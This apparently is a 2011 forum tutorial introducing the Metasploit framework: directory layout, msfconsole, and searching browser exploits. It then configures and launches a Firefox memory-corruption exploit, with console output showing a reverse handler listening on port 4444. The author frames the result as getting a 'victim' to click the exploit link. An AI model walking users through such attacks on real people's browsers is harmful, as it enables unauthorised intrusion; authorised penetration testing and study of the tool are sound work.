Metasploit is an exploitation framework consisting of tools, exploits, knowledge and more. It is a boon to pen-testers, exploit developers and hackers.
This project was started by H.D. Moore and is now an open source project managed by Rapid7.
I will use my Ubuntu 10.10 OS for the code samples, so some commands may be different on other OS versions. If you have queries or questions, please don't hesitate to post in the comments below.
The directory structure
Metasploit has a very self-explanatory and user-friendly directory structure.
The Metasploit directory is located at /opt/metasploit3 on Linux.
Code:
aneesh@aneesh-laptop:~$ cd /opt/metasploit3/
aneesh@aneesh-laptop:/opt/metasploit3$
Let's see the different directories :-
Code:
aneesh@aneesh-laptop:/opt/metasploit3$ ls
app bin env.sh lib msf3 run.sh
aneesh@aneesh-laptop:/opt/metasploit3$ cd msf3/
aneesh@aneesh-laptop:/opt/metasploit3/msf3$ ls
armitage HACKING msfconsole msfgui msfpescan plugins tools
data lib msfd msfmachscan msfrpc README
documentation modules msfelfscan msfopcode msfrpcd scripts
external msfcli msfencode msfpayload msfupdate test
aneesh@aneesh-laptop:/opt/metasploit3/msf3$
The data directory : contains the basic data used by exploits, like PHP sources, wordlists, etc.
Code:
aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd data/
aneesh@aneesh-laptop:/opt/metasploit3/msf3/data$ ls
armitage isight.bundle passivex vncdll.dll
eicar.com java php vncdll.x64.dll
eicar.txt lab post wmap
emailer_config.yaml meterpreter snmp wordlists
exploits msfcrawler sounds
gui msflinker_linux_x86.bin sql
ipwn msfpescan templates
The lib directory : the name is pretty self-explanatory; it contains all the libraries Metasploit needs to work.
The directory of greatest use to us is the modules directory :-
Code:
aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd modules
aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ ls
auxiliary encoders exploits modules.rb.ts.rb nops payloads post
aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$
- The exploits dir : contains the exploits for various platforms and architectures
- The encoders dir : contains various encoders for encoding payloads and other content
- The auxiliary dir : contains tools used for pen-testing like DoS modules, sniffers, scanners, etc.
- The payloads and nops dirs : provide the shellcode (payloads) and NOP sleds used in exploitation (code execution)
Getting to know Metasploit
The main part of Metasploit is its interface types. The four main types of interface are :-
- msfweb (The Web Interface)
- msfgui (The graphical user interface)
- msfconsole (The console interface)
- msfcli (The command line interface)
The most powerful and most used interface is the console interface, so we'll be looking at that throughout this tutorial.
To open Metasploit just type 'msfconsole' in your shell and you should get output similar to this :-
Code:
aneesh@aneesh-laptop:~$ msfconsole
[Metasploit ASCII-art banner]
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 643 exploits - 328 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11647 updated today (2011.01.26)
msf >
Now that we know how to open Metasploit, let's see some of its modules.
We use several commands for this :-
The show all command syntax -
show all
The search command syntax -
search (pattern)
For example, let's search for Firefox exploits and see what's in store for us :-
Code:
msf > search firefox
[*] Searching loaded modules for pattern 'firefox'...
Exploits
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
multi/browser/firefox_escape_retval 2006-07-14 normal Firefox 3.5 escape() Return Value Memory Corruption
multi/browser/firefox_queryinterface 2006-02-02 normal Firefox location.QueryInterface() Code Execution
multi/browser/mozilla_compareto 2005-07-13 normal Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
multi/browser/mozilla_navigatorjava 2006-07-25 normal Mozilla Suite/Firefox Navigator Object Code Execution
windows/browser/apple_quicktime_rtsp 2007-01-01 normal Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
windows/browser/awingsoft_winds3d_sceneurl 2009-11-14 excellent AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
windows/browser/dxstudio_player_exec 2009-06-09 excellent Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
msf >
You will notice that there are many exploits for browser vulnerabilities, and maybe some are useful for us.
This is the power of Metasploit!
Let's use the 'use' command to select an exploit.
Syntax :-
use (module path)
Output :-
Code:
msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) >
Now let's see the options.
Output :-
Code:
msf exploit(firefox_escape_retval) > show options
Module options (exploit/multi/browser/firefox_escape_retval):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Firefox 3.5.0 on Windows XP SP0-SP3
Let us now set the options.
This can be done by using :-
Code:
set (option name) (value)
Now let's set some options according to our needs :-
Code:
msf exploit(firefox_escape_retval) > set SRVHOST localhost
SRVHOST => localhost
msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH /exploit
URIPATH => /exploit
Explanations :-
- 'set SRVHOST localhost' sets the host to localhost; this is the server on which our exploit page is hosted.
- 'set SRVPORT 80' sets the port number on which the server will listen. As we know, port 80 is the default for web servers, so we use that.
- 'set URIPATH /exploit' sets the URL path of the exploit page.
This means that we have to get the victim to open the page at the URL
http://localhost/exploit
for the exploit to work!
Now that the options are set, let's run the exploit.
This can be done by :-
exploit
Output :-
Code:
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.10.2.35:4444
[*] Using URL: http://localhost:80/exploit
[*] Server started.
So the output states that we have successfully started the exploit!
Now the work gets a lot easier:
we just have to make a user with this browser vulnerability click the link.
I hope this is enough to get you started working with Metasploit.